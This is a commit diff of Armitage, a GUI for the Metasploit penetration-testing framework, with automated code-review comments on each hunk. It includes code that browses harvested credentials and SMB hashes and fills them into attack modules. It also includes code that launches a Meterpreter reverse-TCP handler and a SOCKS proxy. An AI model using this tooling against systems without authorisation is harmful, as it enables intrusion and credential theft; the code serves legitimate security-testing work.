$actions["PASSWORD"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD");
$actions["SMBUser"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass");
$actions["SMBPass"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass");
# set up an action to pop up a file chooser for different file type values.
$actions["RHOST"] = {
local('$title $temp');

View File

@ -23,6 +23,7 @@ sub createEventLogTab {
$client = [$cortana getEventLog: $console];
[$client setEcho: $null];
[$console updatePrompt: "> "];
[new EventLogTabCompletion: $console, $mclient];
}
else {
[$console updateProperties: $preferences];
@ -63,6 +64,7 @@ sub c_client {
# run this thing in its own thread to avoid really stupid deadlock situations
local('$handle');
$handle = [[new SecureSocket: $1, int($2), &verify_server] client];
push(@CLOSEME, $handle);
return wait(fork({
local('$client');
$client = newInstance(^RpcConnection, lambda({
@ -91,9 +93,11 @@ sub setup_collaboration {
%r = call($mclient, "armitage.validate", $1, $2, $nick, "armitage", 120326);
if (%r["error"] eq "1") {
showErrorAndQuit(%r["message"]);
return $null;
}
%r = call($client, "armitage.validate", $1, $2, $null, "armitage", 120326);
$DESCRIBE = "$nick $+ @ $+ $3";
return $mclient;
}

View File

@ -95,13 +95,13 @@ sub dispatchEvent {
sub showError {
dispatchEvent(lambda({
[JOptionPane showMessageDialog: $frame, $message];
[JOptionPane showMessageDialog: $__frame__, $message];
}, $message => $1));
}
sub showErrorAndQuit {
[JOptionPane showMessageDialog: $frame, $1];
[System exit: 0];
[JOptionPane showMessageDialog: $__frame__, $1];
[$__frame__ closeConnect];
}
sub ask {
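Review bot: `showErrorAndQuit` no longer terminates the process, so every caller written on the assumption that it does not return now continues executing; `setup_collaboration` in this commit gained an explicit `return $null` for that reason, but every other call site needs the same audit so nothing proceeds with a half-initialised client. Consider renaming it, since "Quit" no longer describes what it does.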
@ -155,7 +155,7 @@ sub chooseFile {
[$fc setFileSelectionMode: [JFileChooser DIRECTORIES_ONLY]];
}
[$fc showOpenDialog: $frame];
[$fc showOpenDialog: $__frame__];
if ($multi) {
return [$fc getSelectedFiles];
@ -179,17 +179,18 @@ sub saveFile2 {
[$fc setSelectedFile: [new java.io.File: $sel]];
}
[$fc showSaveDialog: $frame];
$file = [$fc getSelectedFile];
if ($file !is $null) {
return $file;
if ([$fc showSaveDialog: $__frame__] == 0) {
$file = [$fc getSelectedFile];
if ($file !is $null) {
return $file;
}
}
}
sub saveFile {
local('$fc $file');
$fc = [new JFileChooser];
[$fc showSaveDialog: $frame];
[$fc showSaveDialog: $__frame__];
$file = [$fc getSelectedFile];
if ($file !is $null) {
local('$ihandle $data $ohandle');
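Review bot: `if ([$fc showSaveDialog: $__frame__] == 0)` compares against a magic number; use `[JFileChooser APPROVE_OPTION]` so the intent is clear. `saveFile` directly below still ignores the dialog's return value and goes straight to `getSelectedFile`, so a cancelled dialog can still yield a file there; apply the same check.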
@ -250,10 +251,10 @@ sub left {
sub dialog {
local('$dialog $4');
$dialog = [new JDialog: $frame, $1];
$dialog = [new JDialog: $__frame__, $1];
[$dialog setSize: $2, $3];
[$dialog setLayout: [new BorderLayout]];
[$dialog setLocationRelativeTo: $frame];
[$dialog setLocationRelativeTo: $__frame__];
return $dialog;
}
@ -261,7 +262,15 @@ sub window {
local('$dialog $4');
$dialog = [new JFrame: $1];
[$dialog setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]];
[$dialog setDefaultCloseOperation: [JFrame EXIT_ON_CLOSE]];
fork({
[$dialog addWindowListener: {
if ($0 eq "windowClosing") {
[$__frame__ closeConnect];
}
}];
}, \$__frame__, \$dialog);
[$dialog setSize: $2, $3];
[$dialog setLayout: [new BorderLayout]];
return $dialog;
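Review bot: replacing `setDefaultCloseOperation: [JFrame EXIT_ON_CLOSE]` with a windowClosing listener leaves the frame on Swing's default HIDE_ON_CLOSE, so the window is hidden but never disposed after `closeConnect`; set `[JFrame DISPOSE_ON_CLOSE]` (or dispose explicitly in the listener) so the resources are released.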
@ -277,12 +286,14 @@ sub overlay_images {
return %cache[join(';', $1)];
}
local('$file $image $buffered $graphics');
local('$file $image $buffered $graphics $resource');
$buffered = [new BufferedImage: 1000, 776, [BufferedImage TYPE_INT_ARGB]];
$graphics = [$buffered createGraphics];
foreach $file ($1) {
$image = [ImageIO read: resource($file)];
$resource = resource($file);
$image = [ImageIO read: $resource];
closef($resource);
[$graphics drawImage: $image, 0, 0, 1000, 776, $null];
}
@ -371,15 +382,6 @@ sub wrapComponent {
return $panel;
}
sub setLookAndFeel {
local('$laf');
foreach $laf ([UIManager getInstalledLookAndFeels]) {
if ([$laf getName] eq [$preferences getProperty: "application.skin.skin", "Nimbus"]) {
[UIManager setLookAndFeel: [$laf getClassName]];
}
}
}
sub thread {
local('$thread');
$thread = [new ArmitageThread: $1];
@ -446,7 +448,7 @@ sub quickListDialog {
$button = [new JButton: $2];
[$button addActionListener: lambda({
[$callback : [$model getSelectedValueFromColumn: $table, $lead]];
[$callback : [$model getSelectedValueFromColumn: $table, $lead], $table, $model];
[$dialog setVisible: 0];
}, \$dialog, $callback => $5, \$model, \$table, $lead => $3[0])];
@ -467,6 +469,13 @@ sub quickListDialog {
[$dialog setVisible: 1];
}
sub setTableColumnWidths {
local('$col $width $temp');
foreach $col => $width ($2) {
[[$1 getColumn: $col] setPreferredWidth: $width];
}
}
sub tableRenderer {
return [ATable getDefaultTableRenderer: $1, $2];
}

View File

@ -8,10 +8,10 @@ import java.awt.event.*;
sub addHostDialog {
local('$dialog $label $text $finish $button');
$dialog = [new JDialog: $frame, "Add Hosts", 0];
$dialog = [new JDialog: $__frame__, "Add Hosts", 0];
[$dialog setSize: 320, 240];
[$dialog setLayout: [new BorderLayout]];
[$dialog setLocationRelativeTo: $frame];
[$dialog setLocationRelativeTo: $__frame__];
$label = [new JLabel: "Enter one host/line:"];
$text = [new JTextArea];

View File

@ -16,47 +16,7 @@ import java.awt.event.*;
import ui.*;
sub manage_proxy_server {
manage_job("Auxiliary: server/socks4a",
# start server function
{
launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", $null);
},
# description of job (for job kill function)
{
local('$host $port');
($host, $port) = values($2["datastore"], @("SRVHOST", "SRVPORT"));
return "SOCKS proxy is running on $host $+ : $+ $port $+ .\nWould you like to stop it?";
}
);
}
sub report_url {
find_job($name, {
if ($1 == -1) {
showError("Server not found");
}
else {
local('$job $host $port $uripath');
$job = call($client, "job.info", $1);
($host, $port) = values($job["info"]["datastore"], @("SRVHOST", "SRVPORT"));
$uripath = $job["info"]["uripath"];
local('$dialog $text $ok');
$dialog = dialog("Output", 320, 240);
$text = [new JTextArea];
[$text setText: "http:// $+ $host $+ : $+ $port $+ $uripath"];
$button = [new JButton: "Ok"];
[$button addActionListener: lambda({ [$dialog setVisible: 0]; }, \$dialog)];
[$dialog add: [new JScrollPane: $text], [BorderLayout CENTER]];
[$dialog add: center($button), [BorderLayout SOUTH]];
[$dialog setVisible: 1];
}
});
launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", 1);
}
sub find_job {
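Review bot: `report_url` and the `manage_job` wrapper are deleted here; grep the other scripts for remaining callers, since Sleep resolves sub names at call time and a stale reference only fails when that menu item is used. The new `launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", 1)` call also changes the last argument from `$null` to `1` without a comment saying what the flag means.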
@ -80,26 +40,6 @@ sub find_job {
}, $name => $1, $function => $2));
}
# manage_job(job name, { start job function }, { job dialog info })
sub manage_job {
local('$name $startf $stopf');
($name, $startf, $stopf) = @_;
find_job($name, lambda({
if ($1 == -1) {
[$startf];
}
else {
local('$job $confirm $foo $confirm');
$job = call($client, "job.info", $1);
$confirm = askYesNo([$stopf : $1, $job], "Stop Job");
if ($confirm eq "0") {
call_async($client, "job.stop", $1);
}
}
}, \$startf, \$stopf));
}
sub generatePayload {
local('$file');
$file = saveFile2();
@ -450,6 +390,11 @@ sub _launch_dialog {
elog("launched DNS enum for $domain");
}
}
else if ($type eq "auxiliary" && $command eq "server/socks4a") {
local('$host $port');
($host, $port) = values($options, @('SRVHOST', 'SRVPORT'));
elog("started SOCKS proxy server at $host $+ : $+ $port");
}
launch_service($title, "$type $+ / $+ $command", $options, $type, $format => [$combo getSelectedItem]);
}

View File

@ -15,8 +15,8 @@ sub logNow {
if ([$preferences getProperty: "armitage.log_everything.boolean", "true"] eq "true") {
local('$today $stream');
$today = formatDate("yyMMdd");
mkdir(getFileProper(dataDirectory(), $today, $2));
$stream = %logs[ getFileProper(dataDirectory(), $today, $2, "$1 $+ .log") ];
mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2));
$stream = %logs[ getFileProper(dataDirectory(), $today, $DESCRIBE, $2, "$1 $+ .log") ];
[$stream println: $3];
}
}
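Review bot: `$DESCRIBE` is now a path component of every log file; for team-server connections it is built as `$nick $+ @ $+ $3`, and the nick is user-supplied, so a nick containing `/`, `\`, `..` or characters invalid on Windows would write outside the intended date directory or make `mkdir` fail. Sanitise it to a safe character set before passing it to `getFileProper`.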
@ -26,8 +26,8 @@ sub logCheck {
local('$today');
$today = formatDate("yyMMdd");
if ($2 ne "") {
mkdir(getFileProper(dataDirectory(), $today, $2));
[$1 writeToLog: %logs[ getFileProper(dataDirectory(), $today, $2, "$3 $+ .log") ]];
mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2));
[$1 writeToLog: %logs[ getFileProper(dataDirectory(), $today, $DESCRIBE, $2, "$3 $+ .log") ]];
}
}
}
@ -38,7 +38,7 @@ sub logFile {
local('$today $handle $data $out');
$today = formatDate("yyMMdd");
if (-exists $1 && -canread $1) {
mkdir(getFileProper(dataDirectory(), $today, $2, $3));
mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2, $3));
# read in the file
$handle = openf($1);
@ -46,7 +46,7 @@ sub logFile {
closef($handle);
# write it out.
$out = getFileProper(dataDirectory(), $today, $2, $3, getFileName($1));
$out = getFileProper(dataDirectory(), $today, $DESCRIBE, $2, $3, getFileName($1));
$handle = openf("> $+ $out");
writeb($handle, $data);
closef($handle);
@ -70,7 +70,7 @@ sub initLogSystem {
logFile([$file getAbsolutePath], "screenshots", ".");
deleteFile([$file getAbsolutePath]);
showError("Saved " . getFileName($file) . "\nGo to View -> Reporting -> Activity Logs\n\nThe file is in:\n[today's date]/screenshots");
showError("Saved " . getFileName($file) . "\nGo to View -> Reporting -> Activity Logs\n\nThe file is in:\n[today's date]/ $+ $DESCRIBE $+ /screenshots");
}, \$image, \$title));
}];
}

View File

@ -54,6 +54,29 @@ sub host_selected_items {
item($i, '3. Vista/7', '3', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "Vista"));
item($i, '4. 8/RT', '4', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "8"));
item($h, "Set Label...", 'S', lambda({
# calculate preexisting label to prompt with
local('$label %l $host');
# get a label
foreach $host ($hosts) {
if ($label eq "") {
$label = getHostLabel($host);
}
}
# ask for a label
$label = ask("Set label to:", $label);
if ($label !is $null) {
foreach $host ($hosts) {
%l[$host] = ["$label" trim];
}
call_async($mclient, "db.report_labels", %l);
}
}, $hosts => $2));
separator($h);
item($h, "Remove Host", 'R', clearHostFunction($2));
}
@ -96,10 +119,13 @@ sub view_items {
sub armitage_items {
local('$m');
item($1, 'Preferences', 'P', &createPreferencesTab);
item($1, 'New Connection', 'N', {
[new armitage.ArmitageMain: cast(@ARGV, ^String), $__frame__, $null];
});
separator($1);
item($1, 'Preferences', 'P', &createPreferencesTab);
dynmenu($1, 'Set Target View', 'S', {
local('$t1 $t2');
if ([$preferences getProperty: "armitage.string.target_view", "graph"] eq "graph") {
@ -160,12 +186,13 @@ sub armitage_items {
separator($1);
item($1, 'Exit', 'x', {
item($1, 'Close', 'C', {
if ($msfrpc_handle !is $null) {
closef($msfrpc_handle);
}
[System exit: 0];
map({ closef($1); }, @CLOSEME);
[$__frame__ quit];
});
}
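Review bot: the Close handler no longer closes `$msfrpc_handle` explicitly and relies on `@CLOSEME` instead; make sure the msfrpcd handle is pushed onto `@CLOSEME` where it is created, otherwise a locally started msfrpcd outlives the window.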
@ -223,7 +250,7 @@ sub help_items {
[$dialog add: $label, [BorderLayout CENTER]];
[$dialog pack];
[$dialog setLocationRelativeTo: $null];
[$dialog setLocationRelativeTo: $__frame__];
[$dialog setVisible: 1];
});
}

View File

@ -58,12 +58,38 @@ import ui.*;
sub refreshCredsTable {
thread(lambda({
[Thread yield];
local('$creds $cred');
local('$creds $cred $desc $aclient %check $key');
[$model clear: 128];
$creds = call($mclient, "db.creds2", [new HashMap])["creds2"];
foreach $desc => $aclient (convertAll([$__frame__ getClients])) {
$creds = call($aclient, "db.creds2", [new HashMap])["creds2"];
foreach $cred ($creds) {
$key = join("~~", values($cred, @("user", "pass", "host")));
if ($key in %check) {
}
else if ($title ne "login" || $cred['ptype'] ne "smb_hash") {
[$model addEntry: $cred];
%check[$key] = 1;
}
}
}
[$model fireListeners];
}, $model => $1, $title => $2));
}
sub refreshCredsTableLocal {
thread(lambda({
[Thread yield];
local('$creds $cred $desc $aclient %check $key');
[$model clear: 128];
$creds = call($client, "db.creds2", [new HashMap])["creds2"];
foreach $cred ($creds) {
if ($title ne "login" || $cred['ptype'] ne "smb_hash") {
$key = join("~~", values($cred, @("user", "pass", "host")));
if ($key in %check) {
}
else if ($title ne "login" || $cred['ptype'] ne "smb_hash") {
[$model addEntry: $cred];
%check[$key] = 1;
}
}
[$model fireListeners];
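Review bot: in refreshCredsTableLocal the `$title ne "login" || $cred['ptype'] ne "smb_hash"` test is evaluated twice, once around the key computation and again in the `else if`; drop the outer one. In both functions the empty `if ($key in %check) { }` branch exists only to fall through; `if ($key !in %check && (...))` states the intent directly.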
@ -71,7 +97,7 @@ sub refreshCredsTable {
}
sub show_hashes {
local('$dialog $model $table $sorter $o $user $pass $button $reverse $domain $scroll');
local('$dialog $model $table $sorter $o $user $pass $button $reverse $domain $scroll $3');
$dialog = dialog($1, 480, $2);
@ -83,7 +109,12 @@ sub show_hashes {
[$sorter setComparator: 2, &compareHosts];
[$table setRowSorter: $sorter];
refreshCredsTable($model, $1);
if ($3) {
refreshCredsTableLocal($model, $1);
}
else {
refreshCredsTable($model, $1);
}
$scroll = [new JScrollPane: $table];
[$scroll setPreferredSize: [new Dimension: 480, 130]];
@ -94,7 +125,7 @@ sub show_hashes {
sub createCredentialsTab {
local('$dialog $table $model $panel $export $crack $refresh');
($dialog, $table, $model) = show_hashes("", 320);
($dialog, $table, $model) = show_hashes("", 320, 1);
[$dialog removeAll];
addMouseListener($table, lambda({
@ -131,7 +162,7 @@ sub createCredentialsTab {
$refresh = [new JButton: "Refresh"];
[$refresh addActionListener: lambda({
refreshCredsTable($model, $null);
refreshCredsTableLocal($model, $null);
}, \$model)];
$crack = [new JButton: "Crack Passwords"];
@ -372,3 +403,34 @@ sub launchBruteForce {
[$console start];
}, $type => $1, $module => $2, $options => $3, $title => $4));
}
sub credentialHelper {
thread(lambda({
[Thread yield];
# gather our credentials please
local('$creds $cred @creds');
$creds = call($mclient, "db.creds2", [new HashMap])["creds2"];
foreach $cred ($creds) {
if ($PASS eq "SMBPass" || $cred['ptype'] ne "smb_hash") {
push(@creds, $cred);
}
}
# pop up a dialog to let the user choose their favorite set
quickListDialog("Choose credentials", "Select", @("user", "user", "pass", "host"), @creds, $width => 640, $height => 240, lambda({
if ($1 eq "") {
return;
}
local('$user $pass');
$user = [$3 getSelectedValueFromColumn: $2, 'user'];
$pass = [$3 getSelectedValueFromColumn: $2, 'pass'];
[$model setValueForKey: $USER, "Value", $user];
[$model setValueForKey: $PASS, "Value", $pass];
[$model fireListeners];
}, \$callback, \$model, \$USER, \$PASS));
}, \$USER, \$PASS, \$model, $callback => $4));
}
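Review bot: `$callback` is captured into the selection lambda (`\$callback`) but never invoked, so the `$4` argument the caller passes to credentialHelper has no effect; either invoke it after the model is updated or drop the parameter.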

View File

@ -107,10 +107,10 @@ sub pivot_dialog {
}
local('$dialog $model $table $sorter $center $a $route $button');
$dialog = [new JDialog: $frame, $title, 0];
$dialog = [new JDialog: $__frame__, $title, 0];
[$dialog setSize: 320, 240];
[$dialog setLayout: [new BorderLayout]];
[$dialog setLocationRelativeTo: $frame];
[$dialog setLocationRelativeTo: $__frame__];
[$dialog setLayout: [new BorderLayout]];
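Review bot: `[$dialog setLayout: [new BorderLayout]]` is called twice in this hunk, before and after setLocationRelativeTo; one of them can go.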

View File

@ -182,28 +182,21 @@ sub queryData {
[$progress setProgress: 30];
}
# 4. clients
%r['clients'] = call($mclient, "db.clients")["clients"];
if ($progress) {
[$progress setProgress: 35];
}
# 5. sessions...
# 4. sessions...
%r['sessions'] = fixSessions(call($mclient, "db.sessions")["sessions"]);
if ($progress) {
[$progress setProgress: 36];
}
# 6. timeline
# 5. timeline
%r['timeline'] = fixTimeline(call($mclient, "db.events")['events']);
if ($progress) {
[$progress setProgress: 38];
}
# 7. hosts and services
# 6. hosts and services
local('@hosts @services $temp $h $s $x');
call($mclient, "armitage.prep_export", $1);
@ -291,32 +284,27 @@ sub _generateArtifacts {
[$progress setProgress: 65];
# 4. clients
dumpData("clients", @("host", "created_at", "updated_at", "ua_name", "ua_ver", "ua_string"), %data['clients']);
[$progress setProgress: 70];
# 5. hosts
# 4. hosts
dumpData("hosts", @("address", "mac", "state", "address", "address6", "name", "purpose", "info", "os_name", "os_flavor", "os_sp", "os_lang", "os_match", "created_at", "updated_at"), %data['hosts']);
[$progress setProgress: 80];
# 6. services
# 5. services
dumpData("services", @("host", "port", "state", "proto", "name", "created_at", "updated_at", "info"), %data['services']);
[$progress setProgress: 90];
# 7. sessions
# 6. sessions
dumpData("sessions", @("host", "local_id", "stype", "platform", "via_payload", "via_exploit", "opened_at", "last_seen", "closed_at", "close_reason"), %data['sessions']);
[$progress setProgress: 93];
# 8. timeline
# 7. timeline
dumpData("timeline", @("source", "username", "created_at", "info"), %data['timeline']);
[$progress setProgress: 96];
# 9. take a pretty screenshot of the graph view...
# 8. take a pretty screenshot of the graph view...
[$progress setNote: "host picture :)"];
makeScreenshot("hosts.png");
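Review bot: the hosts column list passed to dumpData contains "address" twice, which produces a duplicate column in the export; the second occurrence can be removed.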
@ -330,7 +318,7 @@ sub _generateArtifacts {
fire_event_async("user_export", %data);
return getFileProper(dataDirectory(), formatDate("yyMMdd"), "artifacts");
return getFileProper(dataDirectory(), formatDate("yyMMdd"), $DESCRIBE, "artifacts");
}
#
@ -368,8 +356,6 @@ sub api_export_data {
}
sub initReporting {
global('$poll_lock @events'); # set in the dserver, not in stand-alone Armitage
wait(fork({
global('$db');
[$client addHook: "armitage.export_data", &api_export_data];

View File

@ -35,9 +35,7 @@ sub result {
sub event {
local('$result');
$result = formatDate("HH:mm:ss") . " $1";
acquire($poll_lock);
push(@events, $result);
release($poll_lock);
[$events put: $result];
}
sub client {
@ -96,16 +94,6 @@ sub client {
[[$handle getOutputStream] flush];
}
# limit our replay of the event log to 100 events...
acquire($poll_lock);
if (size(@events) > 100) {
$index = size(@events) - 100;
}
else {
$index = 0;
}
release($poll_lock);
#
# on our merry way processing it...
#
@ -183,33 +171,30 @@ sub client {
else if ($method eq "armitage.log") {
($data, $address) = $args;
event("* $eid $data $+ \n");
if ($address is $null) {
$address = [$client getLocalAddress];
}
call_async($client, "db.log_event", "$address $+ // $+ $eid", $data);
writeObject($handle, result(%()));
}
else if ($method eq "armitage.skip") {
acquire($poll_lock);
$index = size(@events);
release($poll_lock);
[$events get: $eid];
writeObject($handle, result(%()));
}
else if ($method eq "armitage.poll" || $method eq "armitage.push") {
acquire($poll_lock);
if ($method eq "armitage.push") {
($null, $data) = $args;
foreach $temp (split("\n", $data)) {
push(@events, formatDate("HH:mm:ss") . " < $+ $[10]eid $+ > " . $data);
[$events put: formatDate("HH:mm:ss") . " < $+ $[10]eid $+ > " . $data];
}
}
if (size(@events) > $index) {
$rv = result(%(data => join("", sublist(@events, $index)), encoding => "base64", prompt => "$eid $+ > "));
$index = size(@events);
}
else {
$rv = result(%(data => "", prompt => "$eid $+ > ", encoding => "base64"));
}
release($poll_lock);
$rv = result(%(data => [$events get: $eid], encoding => "base64", prompt => "$eid $+ > "));
writeObject($handle, $rv);
}
else if ($method eq "armitage.lusers") {
$rv = [new HashMap];
[$rv put: "lusers", [$events clients]];
writeObject($handle, $rv);
}
else if ($method eq "armitage.append") {
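Review bot: in the armitage.push branch the loop iterates `$temp` over `split("\n", $data)` but puts `$data` (the whole payload) into the buffer on every iteration, so a multi-line push is recorded once per line; the put should use `$temp`. Separately, armitage.log now takes `$address` from the client and only substitutes `[$client getLocalAddress]` when it is null; since that value becomes part of the db.log_event key, it is worth validating that it looks like an address before use.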
@ -308,6 +293,10 @@ sub client {
$response = [$client execute: $method, cast($args, ^Object)];
writeObject($handle, $response);
}
else if ($method eq "module.execute_direct") {
$response = [$client execute: "module.execute", cast($args, ^Object)];
writeObject($handle, $response);
}
else if ($method in %async) {
if ($args) {
[$client execute_async: $method, cast($args, ^Object)];
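Review bot: `module.execute_direct` forwards the client's arguments unchanged to `module.execute`; a comment explaining how this differs from the existing module.execute handling (not visible in this hunk) and when a client should use it would help the next reader.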
@ -333,6 +322,7 @@ sub client {
if ($eid !is $null) {
event("*** $eid left.\n");
[$events free: $eid];
}
# reset the user's filter...
@ -355,7 +345,7 @@ sub client {
sub main {
global('$client $mclient');
local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle $console');
local('$server %sessions $sess_lock $read_lock $lock_lock %locks %readq $id $error $auth %cache $cach_lock $client_cache $handle $console $events');
$auth = unpack("H*", digest(rand() . ticks(), "MD5"))[0];
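Review bot: nit on the unchanged context line: `$auth` is derived from `rand() . ticks()` hashed with MD5, which is predictable, yet it is handed to every client thread as an authentication value; derive it from a cryptographically secure source such as java.security.SecureRandom instead.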
@ -403,9 +393,6 @@ sub main {
# we need this global to be set so our reverse listeners work as expected.
$MY_ADDRESS = $host;
# make sure clients know a team server is present. can't happen async.
call($client, "core.setg", "ARMITAGE_TEAM", '1');
#
# setup the client cache
#
@ -416,10 +403,12 @@ sub main {
#
$sess_lock = semaphore(1);
$read_lock = semaphore(1);
$poll_lock = semaphore(1);
$lock_lock = semaphore(1);
$cach_lock = semaphore(1);
# setup any shared buffers...
$events = [new armitage.ArmitageBuffer: 250];
# set the LHOST to whatever the user specified (use console.write to make the string not UTF-8)
$console = createConsole($client);
call($client, "console.write", $console, "setg LHOST $host $+ \n");
@ -427,6 +416,9 @@ sub main {
# absorb the output of this command which is LHOST => ...
call($client, "console.read", $console);
# update server's understanding of this value...
call($client, "armitage.set_ip", $host);
#
# create a thread to push console messages to the event queue for all clients.
#
@ -436,12 +428,10 @@ sub main {
sleep(2000);
$r = call($client, "console.read", $console);
if ($r["data"] ne "") {
acquire($poll_lock);
push(@events, formatDate("HH:mm:ss") . " " . $r["data"]);
release($poll_lock);
[$events put: formatDate("HH:mm:ss") . " " . $r["data"]];
}
}
}, \$client, \$poll_lock, \@events, \$console);
}, \$client, \$events, \$console);
#
# Create a shared hash that contains a thread for each session...
@ -538,7 +528,7 @@ service framework-postgres start");
$handle = [$server accept];
if ($handle !is $null) {
%readq[$id] = %();
fork(&client, \$client, \$handle, \%sessions, \$read_lock, \$sess_lock, \$poll_lock, $queue => %readq[$id], \$id, \@events, \$auth, \%locks, \$lock_lock, \$cach_lock, \%cache, \$motd, \$client_cache, $_user => $user, $_pass => $pass);
fork(&client, \$client, \$handle, \%sessions, \$read_lock, \$sess_lock, $queue => %readq[$id], \$id, \$events, \$auth, \%locks, \$lock_lock, \$cach_lock, \%cache, \$motd, \$client_cache, $_user => $user, $_pass => $pass);
$id++;
}

View File

@ -21,6 +21,10 @@ sub getHostOS {
return iff($1 in %hosts, %hosts[$1]['os_name'], $null);
}
sub getHostLabel {
return iff($1 in %hosts, %hosts[$1]['label'], $null);
}
sub getSessions {
return iff($1 in %hosts && 'sessions' in %hosts[$1], %hosts[$1]['sessions']);
}
@ -122,7 +126,7 @@ on sessions {
}
if ($host['show'] eq "1") {
push(@nodes, @($id, describeHost($host), showHost($host), $tooltip));
push(@nodes, @($id, $host['label'] . "", describeHost($host), showHost($host), $tooltip));
}
}
@ -130,14 +134,14 @@ on sessions {
}
sub refreshGraph {
local('$node $id $description $icons $tooltip $highlight');
local('$node $id $label $description $icons $tooltip $highlight');
# update everything...
[$graph start];
# do the hosts?
foreach $node (@nodes) {
($id, $description, $icons, $tooltip) = $node;
[$graph addNode: $id, $description, $icons, $tooltip];
($id, $label, $description, $icons, $tooltip) = $node;
[$graph addNode: $id, $label, $description, $icons, $tooltip];
}
# update the routes
@ -189,6 +193,11 @@ on hosts {
$address = $host['address'];
if ($address in %hosts && size(%hosts[$address]) > 1) {
%newh[$address] = %hosts[$address];
# set the label to empty b/c team server won't add labels if there are no labels. This fixes
# a corner case where a user might clear all labels and find they won't go away
%newh[$address]['label'] = '';
putAll(%newh[$address], keys($host), values($host));
if ($host['os_name'] eq "") {
@ -258,7 +267,7 @@ sub _importHosts {
}
$console = createDisplayTab("Import", $file => "import");
[$console addCommand: $null, "db_import " . strrep(join(" ", $files), "\\", "\\\\")];
[$console addCommand: 'x', "db_import " . strrep(join(" ", $files), "\\", "\\\\")];
[$console addListener: lambda({
elog("imported hosts from $success file" . iff($success != 1, "s"));
}, \$success)];
@ -342,8 +351,10 @@ sub clearHostFunction {
}
sub clearDatabase {
elog("cleared the database");
call_async($mclient, "db.clear");
if (!askYesNo("This action will clear the database. You will lose all information\ncollected up to this point. You will not be able toget it back.\nWould you like to clear the database?", "Clear Database")) {
elog("cleared the database");
call_async($mclient, "db.clear");
}
}
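Review bot: the condition reads as inverted: `if (!askYesNo(...))` clears the database when the dialog returns 0, which is only correct if askYesNo returns JOptionPane's YES_OPTION (0) for Yes; a short comment would save the next reader a trip. The prompt text also has a typo: "toget" should be "to get".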
# called when a target is clicked on...

View File

@ -151,6 +151,11 @@ sub createConsoleTab {
}
sub setg {
# update team server's understanding of LHOST
if ($1 eq "LHOST") {
call_async($client, "armitage.set_ip", $2);
}
%MSF_GLOBAL[$1] = $2;
local('$c');
$c = createConsole($client);
@ -159,12 +164,15 @@ sub setg {
}
sub createDefaultHandler {
warn("Creating a default reverse handler...");
# setup a handler for meterpreter
setg("LPORT", randomPort());
local('$port');
$port = randomPort();
setg("LPORT", $port);
warn("Creating a default reverse handler... 0.0.0.0: $+ $port");
call_async($client, "module.execute", "exploit", "multi/handler", %(
PAYLOAD => "windows/meterpreter/reverse_tcp",
LHOST => "0.0.0.0",
LPORT => $port,
ExitOnSession => "false"
));
}
@ -307,7 +315,12 @@ sub startMetasploit {
savePreferences();
}
$handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null];
if ("*apps*pro*" iswm $msfdir) {
$handle = [SleepUtils getIOHandle: resource("resources/msfrpcd_new.bat"), $null];
}
else {
$handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null];
}
$data = join("\r\n", readAll($handle, -1));
closef($handle);
@ -373,7 +386,7 @@ sub connectDialog {
$msfrpc_handle = $null;
}
local('$dialog $host $port $ssl $user $pass $button $cancel $start $center $help $helper');
local('$dialog $host $port $ssl $user $pass $button $start $center $help $helper');
$dialog = window("Connect...", 0, 0);
# setup our nifty form fields..
@ -390,8 +403,6 @@ sub connectDialog {
$help = [new JButton: "Help"];
[$help setToolTipText: "<html>Use this button to view the Getting Started Guide on the Armitage homepage</html>"];
$cancel = [new JButton: "Exit"];
# lay them out
$center = [new JPanel];
@ -414,9 +425,14 @@ sub connectDialog {
($h, $p, $u, $s) = @o;
[$dialog setVisible: 0];
connectToMetasploit($h, $p, $u, $s);
if ($h eq "127.0.0.1" || $h eq "localhost") {
if ($h eq "127.0.0.1" || $h eq "::1" || $h eq "localhost") {
if ($__frame__ && [$__frame__ checkLocal]) {
showError("You can't connect to localhost twice");
[$dialog setVisible: 1];
return;
}
try {
closef(connect("127.0.0.1", $p, 1000));
}
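Review bot: connectToMetasploit($h, $p, $u, $s) is called at the top of this handler, before the checkLocal guard and the port probe that follows, so the guard's showError and return cannot prevent a connection attempt that has already started. If the call is meant to come after the checks, drop this one; a second call appears at the end of the handler in the next hunk.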
@ -426,37 +442,33 @@ sub connectDialog {
}
}
}
connectToMetasploit($h, $p, $u, $s);
}, \$dialog, \$host, \$port, \$user, \$pass)];
[$help addActionListener: gotoURL("http://www.fastandeasyhacking.com/start")];
[$cancel addActionListener: {
[System exit: 0];
}];
[$dialog pack];
[$dialog setLocationRelativeTo: $null];
[$dialog setVisible: 1];
}
sub _elog {
sub elog {
local('$2');
if ($client !is $mclient) {
# $2 can be NULL here. team server will populate it...
call_async($mclient, "armitage.log", $1, $2);
}
else {
# since we're not on a team server, no one else will have
# overwritten LHOST, so we can trust $MY_ADDRESS to be current
if ($2 is $null) {
$2 = $MY_ADDRESS;
}
call_async($client, "db.log_event", "$2 $+ //", $1);
}
}
sub elog {
local('$2');
if ($2 is $null) {
$2 = $MY_ADDRESS;
}
_elog($1, $2);
}
sub module_execute {
return invoke(&_module_execute, filter_data_array("user_launch", @_));
}

View File

@ -33,7 +33,7 @@ sub listWorkspaces {
$dialog = [new JPanel];
[$dialog setLayout: [new BorderLayout]];
($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "session"), @());
($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "labels", "session"), @());
updateWorkspaceList($table, $model);
[$table setSelectionMode: [ListSelectionModel MULTIPLE_INTERVAL_SELECTION]];
@ -88,15 +88,16 @@ sub workspaceDialog {
local('$table $model');
($table, $model) = $2;
local('$dialog $name $host $ports $os $button $session');
